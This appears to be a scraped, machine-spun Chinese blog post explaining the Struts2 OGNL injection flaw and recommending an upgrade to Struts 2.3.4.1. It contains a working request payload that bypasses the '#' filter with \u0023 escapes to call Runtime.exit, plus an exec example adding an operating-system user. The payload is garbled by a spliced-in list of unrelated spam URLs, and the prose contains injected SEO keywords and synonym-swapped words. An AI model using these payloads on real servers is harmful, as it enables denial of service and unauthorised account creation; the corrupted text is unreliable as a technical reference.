码迷,mamicode.com
首页 > 其他好文 > 详细

struts2漏洞原理及解决办法

时间:2014-08-09 11:30:57      阅读:343      评论:0      收藏:0      [点我收藏+]

标签:style   http   java   os   io   ar   cti   代码   

1、原理

 

Struts2的中心是运用的webwork结构,处置 action时号码大全经过调用底层的getter/setter办法来处置http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当关键词挖掘工具咱们提交一个http参数:

 

?user.address.city=Bishkek&user[‘favoriteDrink‘]=kumys 

ONGL将它转换为:

action.getUser().getAddress().setCity("Bishkek")  

action.getUser().setFavoriteDrink("kumys") 

 

这是经过ParametersInterceptor(参数过滤器)来履行的,运用用户供给的HTTP参数调用 ValueStack.setValue()。 www.2cto.com

 

为了防备篡改服务器端目标,XWork的ParametersInterceptor不允许参数名中呈现“#”字符,但假如运用了Java的 unicode字符串表示\u0023,攻击者就能够绕过维护,修正维护Java办法履行的值:

 

 

?

 

此处代码有破坏性,请在测试环境履行,严禁用此种办法进行歹意攻击

?(‘\u0023_memberAccess[\‘allowStaticMethodAccess\‘]‘)(meh)=true&(aaa)((‘\u0023context[\‘xwork.MethodAccessor.denyMethodExecution\‘]\u003d\u0023foo‘)

 

-        indexRead arguments from command-line "http://www.3h5.cn"

-        indexRead arguments from command-line "http://www.shoudashou.com"

-        indexRead arguments from command-line "http://www.4lunwen.cn"

-        indexRead arguments from command-line "http://www.zx1234.cn"

-        indexRead arguments from command-line "http://www.majiangji168.cn"

-        indexRead arguments from command-line "http://www.penbar.cn"

-        indexRead arguments from command-line "http://www.whathappy.cn"

-        indexRead arguments from command-line "http://www.lunjin.net"

-        indexRead arguments from command-line "http://www.ssstyle.cn"

-        indexRead arguments from command-line "http://www.91fish.cn"(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)((‘\u0023rt.exit(1)‘)(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1 

 

 

 

 

转义后是这样:

 

?(‘#_memberAccess[‘allowStaticMethodAccess‘]‘)(meh)=true&(aaa)((‘#context[‘xwork.MethodAccessor.denyMethodExecution‘]=#foo‘)(#foo=new%20java.lang.Boolean("false")))&(asdf)((‘#rt.exit(1)‘)(#rt=@java.lang.Runtime@getRuntime()))=1

 

 

 

 

OGNL处置时终究的成果即是

 

java.lang.Runtime.getRuntime().exit(1);  //封闭程序,行将web程序封闭

 

相似的能够履行

java.lang.Runtime.getRuntime().exec("net user 用户名 暗码 /add");//添加操作体系用户,在有权限的情况下能成功(在URL顶用%20更换空格,%2F更换/)

只需有权限就能够履行任何DOS指令。

 

2、解决办法

网上许多文章都介绍了三种解决办法,自己觉得将struts2的jar包更新到最新版别最简单,不用更改任何程序代码,当前最新版别2.3.4

下载到的更新包中有许多jar包,我体系中首要用到以下几个更换掉旧版别的:

commons-lang3-3.1.jar        (保存commons-lang-2.6.jar)

javassist-3.11.0.GA.jar        (新加包)

ognl-3.0.5.jar            (更换旧版别)

struts2-core-2.3.4.1.jar    (更换旧版别)

xwork-core-2.3.4.1.jar        (更换旧版别)

 

struts2漏洞原理及解决办法,布布扣,bubuko.com

struts2漏洞原理及解决办法

标签:style   http   java   os   io   ar   cti   代码   

原文地址:http://www.cnblogs.com/haomad/p/3900663.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!